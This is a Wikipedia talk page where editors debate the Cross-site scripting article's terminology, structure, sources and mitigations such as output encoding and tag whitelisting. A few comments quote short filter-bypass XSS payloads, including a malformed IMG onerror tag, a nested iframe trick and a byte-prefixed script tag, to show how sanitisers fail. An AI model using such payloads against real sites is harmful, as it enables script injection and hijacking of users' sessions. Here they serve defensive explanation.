Talk:Cross-site scripting

Page contents not supported in other languages.
From Wikipedia, the free encyclopedia

Tiny NVD Images[edit]

Is there any need for the tiny images of each of the three types of vulnerability on the NVD, the images are impossible to see without opening the full versions of them, and they add nothing to the article. I'm going to remove the images. If anyone disagrees they can revert and tell me why. Also I believe the exploit scenarios should be merged into the descriptions of each type of attack but I will not do that right now--WikiSolved (talk) 18:41, 25 June 2009 (UTC)Reply[reply]

Exploit scenarios[edit]

CLARIFICATION NEEDED ON Type-0 attack: In this section under the subsection Type-0 attack bullet #3 it says, "The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer." There is no explanation of how the vulnerable HTML page got installed locally on Alice's computer or how Mallory knew about it. This is the crux of this attack so without this this part of the explanation this scenario is not useful. I haven't found an answer to this or I would have corrected the article. I'm hoping someone else will read this who has more knowledge of this attach and add the clarifying information.

I added a short blurb that reads "(Local HTML pages are commonly installed with standard software packages, including Internet Explorer.)" Does that clear it up a bit? TDM 13:53, 15 November 2007 (UTC)Reply[reply]


The first paragraph in section:"Other forms of mitigation" is garbage. Just quoting text will not stop it from being interpretted as html. I can always put "> into the text to close the tag. That whole section should be either removed or heavily modified. It is naive and innaccurate. -- 15:06, 4 April 2006 (UTC)Reply[reply]

The use of the word "quoting" in the entire article is very ambigious, which is why Mr misunderstood the article. We should take the time to clarify - "quoting" should be replaced with "encoding". --Blaufish 19:46, 3 May 2006 (UTC)Reply[reply]
Indeed, many people are very confused by "quoting" in HTML. I believe this is the official terminology for encoding HTML special characters, and this was mentioned at the beginning of the "Avoiding XSS vulnerabilities" section. However, for casual readers who don't read that section and aren't familiar with the term in this context, it would probably be best to use "encode" or "encoding" more often. -- TDM 05:07, 28 May 2006 (UTC)Reply[reply]
I agree... "HTML quoting" made absolutely no sense to me, and information about what that means is not easily available. Google searches for "HTML quoting means," "what is HTML quoting," "what does HTML quoting," and the ever-popular define:"HTML quoting" all yeild no results. And there is no Wikipedia entry for "HTML quoting." If it is the official terminology there should probably be a wiki article about it as I'm still uncertain what other people think it is (or what its common usage is). "Encoding" seems better to me. —Preceding unsigned comment added by (talk) 18:17, 21 June 2006

Is XSS in itself a vulnerability?[edit]

"Cross-site scripting (XSS) is a type of computer security vulnerability [...] XSS enables attackers to inject client-side script into Web pages". Is this correct in the first place??? I think the term Cross Site Scripting in itself only describes a page on one site containing a script hosted on another site (or is it having a script hosted on a site sending/loading data to/from another site? Not sure), which may or may not imply a vulnerability. I think what is described in this article is a particular use (or abuse) of XSS. Perhaps it should be calles "XSS Injection", or something like that?

Or am I wrong? Teo8976 (talk) 21:24, 26 January 2015 (UTC)Reply[reply]

No, not wrong at all; perhaps an artifact of authorship... but pretty obviously not correct. Perhaps changing the first paragraph on the page and the first paragraph of the first section would allow the page to remain as it is (tone-wise) while ensuring the information contained therein doesn't color its referential quality. idfubar (talk) 14:29, 4 August 2015 (UTC)Reply[reply]

Avoiding XSS Scripting: blacklisting vs. whitelisting[edit]

There should be some mention of the two different approaches -- blacklisting (i.e., removing anything that can be recognised as a potential script injection) and whitelisting (i.e., only allowing stuff that can be determined not to be a potential script injection). If I had references for this kind of stuff, I'd add it myself, but I came here looking for them. :( JulesH 17:10, 27 July 2006 (UTC)Reply[reply]

This "avoiding" section is written from a programmers point of view. How do users avoid these problems? Justforasecond 14:55, 31 July 2006 (UTC)Reply[reply]
True, it is written from a programmers perspective, which is most relevant. Users can do very little to avoid such attacks, but perhaps a few things should be mentioned. All I can think of from the users' side, is disabling scripting in browsers (usually unworkable), and to avoid trusting links sent to them via email. --TDM 13:28, 8 August 2006 (UTC)Reply[reply]
Or NoScript for Firefox ^.^ 09:34, 28 March 2007 (UTC)Reply[reply]
I haven't personally used NoScript, but it may be a good mitigation. If you add something about it, be sure to link off to something that describes how it works. TDM 13:49, 15 November 2007 (UTC)Reply[reply]
About "since it blocks bad sites only after...". What is a bad site? It may be understood as the site of the bad guys while it is probably one of many "badly" programmed sites.
About "Functionality that blocks all scripting and external inclusions by default and then allows the user to enable it on a per-domain basis is more effective.": It requires at least some references. The examples of "persistent" and non-persistent "attack" show that there is only one site in the picture (Bob's website). This site supposedly deserved trust. To protect against the example attacks, the user has to disable scripts on Bob's website (supposedly the "good" site).Tousavelo (talk) 14:41, 17 August 2008 (UTC)Reply[reply]


I like the recent example of PayPal's XSS hole. However, it isn't mentioned what type it is. Is it a type 1 XSS? If so, we can probably remove the ATutor example, since it isn't very well known, and replace it with the PayPal one. We should also keep the number of examples down to 4-5 if possible. It could easily grow to 1000 if everyone put their favorite in, but we don't need that. --TDM 13:32, 8 August 2006 (UTC)Reply[reply]

No one has responded to this, so I went ahead and ripped out several half-complete examples. It seems this section is becoming a bulletin board for script kiddies to advertise. Honestly people... XSS are a dime a dozen. Posting them to popular security mailing lists is more than enough to get your name out there. I did remove the ATutor example and improved some others, but some still don't list what type of XSS they are. If those who posted them could describe them a bit more, that would make this section more consistent and complete. TDM 22:51, 26 October 2006 (UTC)Reply[reply]
One school-example of XSS would clear up a lot things. —Preceding unsigned comment added by Whendrik (talkcontribs) 07:43, 7 November 2009 (UTC)Reply[reply]


Someone added the notice recently that this page may not meet Wikipedia's standards due to the need for restructuring. Could whoever added that elaborate? I don't see any new comments here specific to that evaluation. If there's some other organization that would work better, I'd be willing to improve the document. TDM 23:57, 19 October 2006 (UTC)Reply[reply]

Guilty as charged. I should have added a note with some suggestions. Firstly, I found the article confusing and difficult to read, despite having a 15-year background as a systems software engineer. Specifically, the article does not _begin_ with a clear definition of cross-site scripting. Secondly, the sections characterising the types of cross-site scripting are hard to read. I would suggest that in a sense the article could be considered as "written backwards" in that the _examples_ given just after the "types" section show the clearest writing, and are the nearest thing the article has to a clear _definition_. Consider moving these to the front of the article since a "definition by example" would be an improvement. So "restructuring" the article could mean trying moving things around into a more logical order so that things are clearly defined _before_ they are referenced. And if clear definitions are not easily obtainable, perhaps because of lack of consensus, then definition-by-exemplification is definitely the way to go. CecilWard 10:20, 20 October 2006 (UTC)Reply[reply]
I have expanded the first paragraph's description and re-ordered the first two sections, which will hopefully help a bit. I don't have time to rewrite the types at the moment, but I did try to clean up the real world examples a bit. I agree that an example early in the article will help those who don't have a clear grasp of all of the background material, but I think it should be relatively short and as simple as possible. When I originally put most of the text together, I wanted to be sure to put the vulnerability in the context of the same-origin policy, otherwise the technical reason why XSS is even a vulnerability at all may be difficult to understand. Because of the order in which things are referenced (e.g. "XSS" abbreviation), a major reordering would require a lot of rewriting as well. However, I agree that the long background section, coupled with the terminology section makes for a long read before casual readers get to any solidifying examples. Thanks for the feedback. TDM 22:48, 26 October 2006 (UTC)Reply[reply]
The issue pointed out by CecilWard regarding how the article begins appears to still be at issue (ten years later) and should probably be addressed by way of a different introductory paragraph (i.e. different sentences in the first paragraph of the first two sections) and was mentioned in another section of the Talk page as well... — Preceding unsigned comment added by Idfubar (talkcontribs) 14:34, 4 August 2015 (UTC)Reply[reply]

Link to HTML Purifier[edit]

I'd like to add a link to HTML Purifier in the Prevention section, as it implements the most reliable method: parsing and stripping all tags/attributes not in the whitelist (as well as other protection). Unfortunately, I wrote the library, so if I put it on it's vanity. So could someone take a look and, if it looks useful, add the link for me? Thanks! — Edward Z. Yang(Talk) 23:36, 29 November 2006 (UTC)Reply[reply]

A bit quiet around here hmm... I'll wait another week. — Edward Z. Yang(Talk) 02:37, 2 December 2006 (UTC)Reply[reply]
In my not-so-humble-opinion, stripping tags is never the most reliable method. HTML entity encoding is likely the only safe method. Sure, you can't develop a complex stripping system that is designed only to allow good things through, and this might work most of the time, but browsers are just too inconsistent for this to let many sleep well at night. I don't care if you link to it, but don't change the text saying it is the best way to go or anything like that. TDM 17:32, 23 January 2007 (UTC)Reply[reply]
The article already has text in "Avoiding XSS vulnerabilities" that states: "The most reliable method is for web applications to parse the HTML, strip tags and attributes that do not appear in a whitelist, and output valid HTML." (Which I did not add to the article). It probably is POV, but I think it's correct (we'll need to find a citation for it, then). Making a complex stripping system is not impossible: as HTML Purifier demonstrates, it has been done.
Browser inconsistency is a trickier issue, but I believe that it too poses no problem as long as you enforce standards-compliant code. Browsers begin to have wildly differing interpretations of HTML when it's ambiguous, when you have things like <IMG src="" style"="style="a /onerror=alert(String.fromCharCode(88,83,83))//" >`> . If you get rid of this craziness and enforce well-formed XHTML, you're gold. (Just don't allow comments). — Edward Z. Yang(Talk) 04:34, 25 January 2007 (UTC)Reply[reply]
I still don't agree with you Edward, sorry. I did not put that text there that you quoted, and I think it's definitely a PoV. The problem is not with HTML itself, in all of it's incarnations. You can certainly write a reliable stripper that guarantees properly-formed HTML is not injected. But what you can't guarantee is that a browser won't interpret broken tags as proper tags. An attack which used to work against hotmail was: <ifra<iframe >me src="">. Of course hotmail would strip the inner, properly formatted iframe, but it wouldn't make a second pass and remove outer one, which became properly formatted after the first was stripped. Another blunder by Microsoft was with their magical .NET 2.0 tag checking. Here, they look for "evil" things and reject them when they find them. However their algorithms didn't even match what IE interprets as valid tags. The attack that worked was <\x01script ...> (where "\x01" should be interpreted as the literal 01 byte). This fooled the "evil" searching algorithm while IE happily ignored the weird byte and used the tag. You have to completely understand the parsing algorithms of 3-4 browsers for 3-4 versions back before you can reliably create a tag stripper that I'll trust. Others feel the same way about this. TDM 13:48, 15 November 2007 (UTC)Reply[reply]
if you find <iframe> in the first pass you could simply discard the whole input, if you find <iframe> again in a second pass, you *know* that someone tried to play smart and you can file a case... ;) the problem is that computers can be save, but programmers aren't :>
I just don't agree that any kind of HTML parsing algorithm will do it right in all cases given the current state of HTML. It is fine to mention that this approach is used and is one option, but it is *FAR* from the safest approach. Have you taken into account things like UTF-7 encodings while you're doing this parsing? Outright rejecting any input that looks like it contains tags is much better than trying to sanitize input, but it's still going to be far from perfect. In my work as a penetration tester, I've exploited hundreds of pages that try to use similar techniques. It's just too hard to get it right for all browsers under all HTML and encoding variants. TDM (talk) 19:45, 17 April 2008 (UTC)Reply[reply]

Vulnerability example/demonstration[edit]

I'm not familiar enough with this article to know exactly where this should go, but I think this presentation of a Google Desktop vulnerability is extremely educational - they show how such small vulnerabilities in this case end up cascading into complete control over the victim's computer. The vulnerabilities they use are all patched (I think including one glitch that's server-side), so they no longer work, so it should be safe to show. This sounds like Type 2 in the article. —AySz88\^-^ 20:39, 22 February 2007 (UTC)Reply[reply]

That looks like a good resource. I wouldn't have a problem with its addition. Is there a plain-text version, though? — Edward Z. Yang(Talk) 00:38, 25 February 2007 (UTC)Reply[reply]

XSS v CSS[edit]

I was almost certain we'd previously had a discussion on this, but obviously this is not the case. So, I'll bring it to the floor now.

I am strongly opposed to including the acronym "CSS" in the introduction paragraph of the article. It is misleading term that no one uses anymore, as the Terminology statement already states, and thus, while deserving mention in that segment, should not be in the intro. — Edward Z. Yang(Talk) 22:42, 28 February 2007 (UTC)Reply[reply]

It is true that most people (especically in the security community) today no longer use "CSS" to refer to cross-site scripting, since this acronym can refer to another technology. Nevertheless, AFAIK, a few existing articles (including some more recent ones) in the Internet still use this acronym, or use both acronyms simultaneously to refer to cross-site scripting (examples for using both: [1] and [2]). While we should certainly discuss the more appropriate or prefered term in the main article (e.g. in the Terminology section), it seems better that other terms are also mentioned in the intro as long as it is still used by some people or can be commonly found. Or, we can change/rephrase the intro statement a bit to make it more clear.-- 08:16, 1 March 2007 (UTC)Reply[reply]
I can see where you're coming from. Maybe we could bump to the end of the intro paragraph. — Edward Z. Yang(Talk) 22:27, 1 March 2007 (UTC)Reply[reply]
It seems good.-- 01:38, 2 March 2007 (UTC)Reply[reply]

This article is very well written[edit]

It's well-structured, concise, disambiguating, sufficiently detailed, and very clear. 22:24, 6 April 2007 (UTC) d following information is so good.Reply[reply]

Disagree. The "Persistent" section is stupid. One, Mallory is a girl's name. Two, hackers do not watch football. Three, hackers would not use a dating website to find mates, if a hacker needed a mate they would use IRC or a relatively unknown underground chat program. Four, a hacker would use a girl's name for the purpose of elite deception. With this level of incongruity to reality, you might as well talk about Batman and Lex Luthor battling demons in space. — Preceding unsigned comment added by (talk) 15:47, 16 June 2011 (UTC)Reply[reply]

There's also a singing group[edit]

called XSS. I don't know how to do disambiguation pages, and I'm not an expert on XSS (that's why I was looking them up), but maybe someone can help clarify this? All I know about XSS is that they sing sort of hip-hop style R&B in English, and that they're at least popular in the middle east.

I believe that there has been an XSS disambiguation page created now that you could add to. TDM (talk) 19:46, 17 April 2008 (UTC)Reply[reply]

The Reason For Wiki Formatting?[edit]

Are XSS and the difficulty with interpreting and reformatting HTML some of the reasons why wikis don't use HTML for formatting? I know that one reason for not using HTML is that it might be difficult for some wiki users to learn. But it seems that the wiki formatting also helps prevent XSS while giving the users some control. --Lance E Sloan 16:57, 8 August 2007 (UTC)Reply[reply]

Yes, wiki's use alternate formatting languages largely due to XSS. If they allowed raw HTML, it would be trivial to hijack anyone else's account and post on their behalf in most cases. Obviously alternate languages can be easier for non-programmers to learn, but I think this is the main reason. Keep in mind, the use of an alternate language does not prevent XSS alone. It must be very carefully implemented. I've seen bulletin board posting languages which allowed injection through attribute parameters. In the language I was testing, one would specify something like: [link url="http://..."]text[endlink] to produce <a href="http://...">text</a>. However, if you supplied "" as the URL, the page would render as <a href="">">text</a>, indicating an obvious injection. TDM 13:40, 15 November 2007 (UTC)Reply[reply]

Maybe the wrong place, but...[edit]

I have been getting strange XSS warnings in FF from wikipedia articles with images lately. Does anyone know if there has been a change in the template formatting of images or if its a FF bug?

vulnerability or attack?[edit]

isn't cross site scripting really an attack and not a vulnerability? the vulnerability is most clearly input validation. the attack is script injection, of which cross site scripting is a a specific type of injection. do we agree? —Preceding unsigned comment added by (talk) 19:32, 5 September 2007 (UTC)Reply[reply]

Well, I would agree that cross-site scripting could be used to refer to an attack. However, there is a vulnerability at the core of it which allows the attack to succeed. I strongly disagree with the assertion that it's a "input validation" flaw, because the real problem output-encoding. These are very different issues, even though people tend to lump them together. What if you want your application to handle nearly any kind of input (free-form text field with multiple languages/character sets) but don't want it to be vulnerable? You can't validate the input carefully (and prevent HTML special characters from getting in there), but you *can* encode the output. It's an injection flaw, whose correct fix is to treat special characters as literals. Yes, you can use validation up-front in 95% of the cases to mitigate the problem, and you *should* do this, since input validation can mitigate other types of vulnerabilities as well, but it is just a mitigation. TDM 13:31, 15 November 2007 (UTC)Reply[reply]

Passive Aggressive Page Tagging[edit]

When you tag the page as "needs cleanup", "needs citations", "needs an expert", or whatever, please include a description here of the specific criticisms. I consider myself an expert on this topic and have wrote most of the content for the page. However, I'm a busy guy and only have time to look at the page once every few months. I certainly don't have time to read up on every Wikipedia policy regarding format, so please describe your gripes rather than just doing a hit-and-run tag like that. I can guess the citations issue could be resolved by adding inline external links or footnote tags. Certainly there are plenty (too many) of external resources listed at the bottom that could be better referenced internally to back up the page's assertions. However, the "needs an expert" tag confuses me. TDM (talk) 19:55, 17 April 2008 (UTC)Reply[reply]

Hello, TDM. I will remove the expert tag. Just happened to see your note, I am not an expert on the topic but would be happy to help do the citations. —SusanLesch (talk) 15:19, 11 May 2008 (UTC)Reply[reply]
Hi SusanLesch. Thanks for responding. I know the article lacks direct citations of several assertions. If you see statements that could use backing up, feel free to insert the little "needs citation" marks on the specific sentences. Sometimes it's hard when you're knee deep in this stuff to realize that certain things, which seem obvious, need backing up with references. I can then try to track down some references for those specific items. TDM (talk) 17:56, 23 May 2008 (UTC)Reply[reply]
One para is now cited, using your text as a framework. Barring unforseen circumstances which are possible, I figure if a person can learn JavaScript in 24 hours I might have what I can do done in five to seven days. If you are available then to make corrections for all the errors I introduce that would be great. If anyone else is available and interested we could be done in half that time with luck. —SusanLesch (talk) 17:25, 27 May 2008 (UTC)Reply[reply]
Citing is done except one which is marked. I removed my cartoons, the python section and the lists mentioned below. OK from my point of view to throw out all the computers and start over. Only half kidding. Thank you TDM. —SusanLesch (talk) 12:15, 8 June 2008 (UTC)Reply[reply]
Is there any reason to retain the "cleanup" tag, especially since there's no reason specified? This is a really excellent article. I'm not an expert by any means but I know enough about the subject and Wikipedia style to see that there's very little to do here. Maybe if whoever objects could put a few inline notices like "citation needed" because it's totally unclear to me where the cleanup needs to happen. Does anyone else support removing the misleading tag? Phette23 (talk) 23:10, 23 February 2013 (UTC)Reply[reply]
I support removing the tag. I don't see any justification for it. I have removed the tag. I have restored the article's B rating. -—Kvng 15:57, 24 February 2013 (UTC)Reply[reply]

Avoiding/Prevention Rewrite[edit]

I think this section is currently pretty weak. For one, the Python example can probably go away, since it isn't an ideal filter. Perhaps it would be better to start with a more abstract description of how to do white-list based character encoding (i.e., all characters except those in a white list get encoded), then move on to some algorithms or examples of libraries that already do this. Finally, I think it's important to include a note on defining a page's character set to prevent UTF-7 based attacks. There are very few good references online for this... mostly just specific vulnerabilities and associated exploits. I might get around to this rewrite at some point, but feel free to give it a go if anyone is interested. TDM (talk) 18:01, 23 May 2008 (UTC)Reply[reply]


Hi. The "External links" section was tagged since last November so I removed it except for a couple. In case anyone needs them, here they all are. —SusanLesch (talk) 17:46, 28 May 2008 (UTC)Reply[reply]

The other list was real-world examples which are all here and now summarized in one paragraph under "Background". If anyone thinks that a list makes sense ok from my point of view to restore it. —SusanLesch (talk) 02:31, 29 May 2008 (UTC)Reply[reply]


From the Mitigation section, this was cut only because OpenAjax recommends iframe and I don't know how to reconcile the two thoughts. Maybe someone else would be able to restore this sentence if it needs to be there. Thanks. —SusanLesch (talk) 06:10, 9 June 2008 (UTC)Reply[reply]

"Unfortunately external content can still be loaded into the page with elements like iframe or object to trick users.[1]"


  1. ^ How can I avoid the problem?, in "Frequently Asked Questions About Malicious Web Scripts Redirected by Web Sites". CERT Coordination Center, Carnegie Mellon University. December 7, 2004. Retrieved 2008-06-04. {{cite web}}: Check date values in: |date= (help)


Shouldn't specific tactics be listed? For example, a server which supports HTTP TRACE (or is accessed via such a proxy server[3]) is probably vulnerable to XST (cross-site tracing)[4]. --Jesdisciple (talk) 23:35, 1 October 2008 (UTC)Reply[reply]

Type 1 - missing the point[edit]

Due to the general requirement of the use of some social engineering in this case (and normally in Type 0 vulnerabilities as well), many programmers have disregarded these holes as not terribly important. This misconception is sometimes applied to XSS holes in general (even though this is only one type of XSS) and there is often disagreement in the security community as to the importance of cross-site scripting vulnerabilities.

This section misses the entire point. If I wanted to grab cookies from users using some form of local JavaScript exploit (just an example, there are hundreds of other things possible), I could use a type 1 vulnerability on a forum or popular website in order to attack the maximum number of users. The social engineering side of it is therefore a side-note, as it only applies when an attacker is targeting one specific user - and even then if they know they frequent that site they don't have to social engineer them at all.

Furthermore, what's with the names in the exploit scenarios? I'm all for equality but I'd like to see names in there that are at least somewhat universally pronounceable and single-barrelled. Try something like Anne instead of Lorenzo de Medici. (talk) 10:58, 5 October 2008 (UTC)Reply[reply]

Even more importantly, the names Alice, Bob, and Mallory are technical terms within the computer security world and should be preserved in this article. Reverted. (talk) 19:28, 28 October 2008 (UTC)Reply[reply]

Frequency of sites that require JavaScript?[edit]

In the section "Eliminating scripts", our article says:

Another drawback is that most sites do not work without client-side scripting, forcing users to disable protection for that site and opening their systems to the threat

I just added a {{dubious}} tag because I frankly don't think it is true, and the citation given doesn't support the claim! The supporting cite is:

73% of sites relied on JavaScript in late 2006, in {{cite news|title='Most websites' failing disabled|url=|publisher=BBC News|date=[[December 6]], [[2006]]|accessdate=2008-06-04}}

However, the quote in BBC article does not claim that 73% of websites rely on JavaScript, it says that "A further 73% failed to make the grade because of their reliance on JavaScript for some of the website's functionality." (My emphasis.) The difference is subtle but critical; if I say in an unqualified way that "mechanism A relies on B", it will be understood to mean that without B, A doesn't work at all. However if we say that "mechanism A relies on B for some functions", then clearly A still works without B.

I think that this weaker claim is perfectly plausible -- but also highly misleading, because in many cases, the lost functionality is inconsequential, or even annoying. I have been using NoScript for nearly three years now, and while it is probably true that only 27% of websites make no use of JavaScript whatsoever, it certainly is not true that the other 73% all require it in order to work. I am a net junky, but I have only 11 sites whitelisted (apart from the defaults); all the scores of other things I do on the net just don't need it. In fact, my subjective impression is that overwhelmingly the most common usage of JavaScript is for randomisation of ad loading; so on those sites, disabling scripts does nothing but speed up page loading and reduce clutter. The next most common usage would be form validation -- the absence of which you will generally not even notice (especially as all the most common types of data entry errors aren't detected by client side scripts anyway.) I don't know what fraction of websites critically depend on JavaScript in order to work at all (if I knew, I'd just edit the article), but it's nothing like 73%. -- Securiger (talk) 05:36, 8 October 2008 (UTC)Reply[reply]

Non-technical explanation?[edit]

Is there any scope in this article for a non-technical explanation? What does "injecting" scripts mean? Can it be explained in non-technical language? I would request a short section with a "non-technical explanation". (Or has this issue been dealt with somewhere? The need, or not, of providing non-technical explanations...) Devadaru (talk) 16:33, 23 January 2009 (UTC)Reply[reply]

The page was just revised and due to the (albeit minor) grammatical changes it could very well be the case that the page reads more accessibly to a non-technical audience - perhaps another pass over its content would be appropriate?idfubar (talk) 21:20, 5 August 2015 (UTC)Reply[reply]

List of Prominent Domains[edit]

The list of prominent domains hacked seems like it's promoting XSS hackers' glory. I don't think the New Zealand herald, for example, or an obama discussion forum, are nearly as prominent as google or yahoo. Maybe we could cull the list down to 4 or 5. —Preceding unsigned comment added by (talk) 16:51, 5 March 2009 (UTC)Reply[reply]

no reference to non-harmful xss[edit]

Sometimes one would like to use XSS explicitly to communicate different apps. HTML5 (IE8, FF3) support window.postMessage, that is told to support cross-site messaging. I think there should be a reference to all that stuff in the article. (talk) 14:06, 17 December 2009 (UTC)Reply[reply]

Perhaps a rewrite of the first two sentences of the first two sections would address the same? idfubar (talk) 17:47, 5 August 2015 (UTC)Reply[reply]

How to list?[edit]

In April 2010 an XSS vulnerability in JIRA was the stepping stone to the compromise of key Apache Software Foundation servers [1]. The method used in this XSS doesn't seem to match any of the ones in the article. --Walter Görlitz (talk) 22:36, 7 May 2010 (UTC)Reply[reply]

Why do you need to "list" this in the article? I don't see much value there for explaining what XSS is.
It was most likely a reflected XSS vulnerability, because the admin was sent a tinyurl address, that redirected back to Apache's JIRA with a crafted URL. -- intgr [talk] 21:36, 8 May 2010 (UTC)Reply[reply]


  1. ^ Ryan Naraine (2010-04-13). "Apache Foundation Hit by Targeted XSS Attack". Retrieved 2010-05-07.

Persistent vs. Non-persistent Example[edit]

The example at the end of the non-persistent section is actually a persistent attack. It is confusing. —Preceding unsigned comment added by (talk) 17:35, 5 May 2011 (UTC)Reply[reply]

The overall quality of current article is poor and need a rewrite[edit]

I see three major problems of the current article:

1. Although I am not a native English speaker, I am sure the author of the major part of this article is not a native English speaker. And more importantly, he/she is not capable of creating a wiki quality article in English. Examples: No example. You may read through the article to feel it.

2. The technical terms used in this article are non-standardized and even not consistent within the article itself. Some examples:

- “Cross-site scripting holes are web-application vulnerabilities”, “In recent years, cross-site scripting flaws”

- “Besides content filtering”

What is “content filtering”? I actually understand what it means. But why not just uses the terms which have been used in previous sections such as “output encoding” or “input validation”? This article is full of this kind of inconsistent terms.

3. The article has quite a lot of technical errors. Examples:

- The section about DOM based XSS is essentially wrong.

The author should read the OWASP link carefully and discuss with domain expert to ensure he really understands DOM based XSS before creating the section.

- “Safely validating untrusted HTML input”

This section itself is right but misleading. ALL input data from user / network / un-trusted source should be validated – not only the HTML input.

- “Some companies offer a periodic scan service, essentially simulating an attack from their server to a client's in order to check if the attack is successful”

Just one attack? No. The security scanning / assessment service generally tries all kinds of possible attacking types and vectors not just “an attack”.

- “There are several different escaping schemes … including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding”

This sentence missed a word “etc.” at the end of the list. There are more encoding schemes for XSS prevention besides the listed 4.

- “Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS in a fairly straightforward manner.”

- “Encoding can be tricky”

Above two statements are self-contradict. Is encoding (escaping) fairly straightforward or tricky?

- “When Bob reads the message, Mallory's XSS steals Bob's cookie.”

No. It is not Mallory’s XSS. It is the web site’s XSS. And it is the script code injected by Mallory which steals Bob’s cookie. The wording here is too casual, too loose for a wiki article.

- “External links” section, the link “Simple XSS explanation”

Why the link is there? It points to a very poor quality paper - it is far from a qualified reference for a wiki page.

- Etc.

In summary, I suggest a total rewriting of the whole article – the OWASP page could be a good reference.

Condor Lee (talk) 22:03, 5 June 2012 (UTC) Condor LeeReply[reply]

__SOME__ browsers?[edit]


 Some browsers or browser plugins can be configured to disable client-side scripts

i've never seen a browser that cannot disable javascripts.. if no1 can name a browser that cannot disable scripts, i will change that statement.. (im NOT talking about plugin/integrated browsers, i can mention 1 right now: Valve's Steam's integrated browser ;p) all mainstream browsers at least, including Opera, Firefox, Internet Explorer, Safari all allows this. Divinity76 (talk) 12:02, 27 June 2012 (UTC)Reply[reply]

IE on Windows Phone 8 does not allow disabling Javascript. — Preceding unsigned comment added by (talk) 03:25, 16 October 2014 (UTC)Reply[reply]

Is XSS a vulnerability?[edit]

I wonder do we confuse "XSS" term with "XSS vulnerability" term (or "XSS attacks", or "XSS based attacks", etc.) in this article?

Are "XSS" and "XSS vulnerability" really the same?

Michael V. Antosha (mivael) (talk) 07:05, 11 October 2012 (UTC)Reply[reply]

Yes, the terminology is confused by the article's present state and the two terms "XSS" and "XSS vulnerability" do not mean the same thing... though the point was mentioned previously (under the 'Restructuring' section)... idfubar (talk) 14:47, 4 August 2015 (UTC)Reply[reply]

Include client-side filtering?[edit]

Should there be a section in Prevention about client-side filters such as XSS Auditor (Chrome) and NoScript (Firefox)? NoScript is mentioned for its ability to block all scripting, but it also includes a specific and advanced XSS filter, even if you enable JavaScript. XSS Auditor is less comprehensive (it has to be - it's targeting all Chrome users, instead of a security-minded subset of Firefox users), but it's significant. Carl.antuar (talk) 06:15, 5 March 2014 (UTC)Reply[reply]

Sounds good to me. In general, WP:BOLD -- intgr [talk] 12:49, 6 March 2014 (UTC)Reply[reply]

Surprising that foreign scripts ARE allowed at all.[edit]

Just an observation, but in view of the fact that pages cannot access cross-site cookies, I was quite suprprised -and indeed alarmed- to see that the same does not apply to Javascript. If script URLS could only be local files or URLs of the same root domain as the hosting page, that would nail all of the exploits bar the inline scripting ones, which are limited in scope without a foreign script to call. The existing situation seems to be a classic example of feature-bloat taking precedence over security. Though, I daresay a change now would break a lot of existing sites that rely on foreign scripts, for example jQuery being loaded from Google.

Mozilla browsers typically have an option to allow no cookies, local cookies or all cookies. Why not have the same for Javascript? --Anteaus (talk) 20:54, 28 May 2014 (UTC)Reply[reply]

When you say, "break a lot of existing sites", the answer is "Yes, 99.99999% of them" - and there are billions of websites, so that's probably not even an exaggeration. But in any case, XSS typically becomes inline script in the vulnerable page, so disabling third-party scripts wouldn't achieve much. Carl.antuar (talk) 23:01, 24 January 2016 (UTC)Reply[reply]


I think it's worth mentioning BBCode as a solution to avoid visitors injecting HTML tags such as <script> into their comments. Something commonly used on (nearly all) modern forum softwares. — Preceding unsigned comment added by (talk) 15:49, 28 December 2015 (UTC)Reply[reply]

Cookie-based Persistent XSS[edit]

Perhaps there should be mention of so-called "semi-persistent" XSS, where the server negligently stores the payload in a cookie (or other client-side storage) that will later be used to assemble pages: Carl.antuar (talk) 23:06, 24 January 2016 (UTC)Reply[reply]

Inconsistent use of "Mallory"[edit]

In some sections, "Mallory" is used as a woman's name and others it's used as a man's name. — Preceding unsigned comment added by Khatchad (talkcontribs) 16:31, 2 March 2016 (UTC)Reply[reply]

The web server could be set to redirect invalid requests[edit]

Several things could have been done to mitigate this attack:

The search input could have been sanitized which would include proper encoding checking. The web server could be set to redirect invalid requests.

There's no invalid request here.

Khatchad (talk) 16:34, 2 March 2016 (UTC)Reply[reply]

External links modified[edit]

Hello fellow Wikipedians,

I have just modified one external link on Cross-site scripting. Please take a moment to review my edit. If you have any questions, or need the bot to ignore the links, or the page altogether, please visit this simple FaQ for additional information. I made the following changes:

When you have finished reviewing my changes, you may follow the instructions on the template below to fix any issues with the URLs.

This message was posted before February 2018. After February 2018, "External links modified" talk page sections are no longer generated or monitored by InternetArchiveBot. No special action is required regarding these talk page notices, other than regular verification using the archive tool instructions below. Editors have permission to delete these "External links modified" talk page sections if they want to de-clutter talk pages, but see the RfC before doing mass systematic removals. This message is updated dynamically through the template {{source check}} (last update: 18 January 2022).

  • If you have discovered URLs which were erroneously considered dead by the bot, you can report them with this tool.
  • If you found an error with any archives or the URLs themselves, you can fix them with this tool.

Cheers.—InternetArchiveBot (Report bug) 09:52, 9 December 2017 (UTC)Reply[reply]

Fixed a broken link - but then it was reverted by User:Jmccormac[edit]

Hey User:Jmccormac,

I saw that you reverted my edit to a broken link & noted that it was a promotional link. It wasn't meant to be promotional. It was a recent blog post that I wrote covering the Cross-Site Scripting bug. The link in wikipedia was broken, but in addition to that when using waybackmachine to check the broken link the content was outdated & lacking important points. Important details such as the different forms of XSS as well as the steps to mitigate the vulnerability were missing. The blog post I replaced the broken link covered those key points.

I did go back and review the blog post that I used to replace the broken link to figure out what might've made it 'promotional' -- It did have a form at the bottom to sign up for notifications of any future posts, which I removed this morning.

Please let me know if there are any other concerns about the article & how it might be considered promotional. If not, I'd appreciate the chance to have my replaced link stay on the article. Thanks! — Preceding unsigned comment added by X-Security-Austin (talkcontribs)

You didn't fix a broken URL (a URL with a working archive link, and so didn't actually need to be fixed at all), you substituted a link to a completely different source - apparently your own company website. Linking your own website is always promotional. - MrOllie (talk) 18:31, 18 November 2021 (UTC)Reply[reply]
There was a problem with it being promotional in that it was a link to your site. With Wikipedia, it is necessary for links to be notable and reliable. Even if the author is an expert on the subject, blog posts are often problematic as they may not be considered Reliable Sources in Wikipedia terms. The article could do with being kept up to date but links have to be to what Wikipedia considers Reliable Sources.Jmccormac (talk) 19:37, 18 November 2021 (UTC)Reply[reply]